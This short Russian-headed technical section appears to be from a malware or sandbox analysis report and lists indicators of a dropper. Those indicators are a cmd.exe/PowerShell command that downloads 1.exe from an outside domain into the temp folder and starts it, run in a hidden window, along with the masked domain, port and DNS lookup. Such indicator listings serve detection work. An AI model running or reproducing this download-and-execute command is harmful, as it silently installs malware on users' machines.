Техническая информация
- $url.tostring(
- '<SYSTEM32>\cmd.exe' /c powershell Foreach($url in @({http://mycustomized.com/system/logs/1.exe})){try{$path = '%tmp%\38729.exe';(New-Object System.Net.WebClient).DownloadFile($url.ToString(), $path);Start-Process ...
- 'my####omized.com':80
- http://my####omized.com/system/logs/1.exe
- DNS ASK my####omized.com
- '<SYSTEM32>\cmd.exe' /c powershell Foreach($url in @({http://mycustomized.com/system/logs/1.exe})){try{$path = '%tmp%\38729.exe';(New-Object System.Net.WebClient).DownloadFile($url.ToString(), $path);Start-Process ...' (со скрытым окном)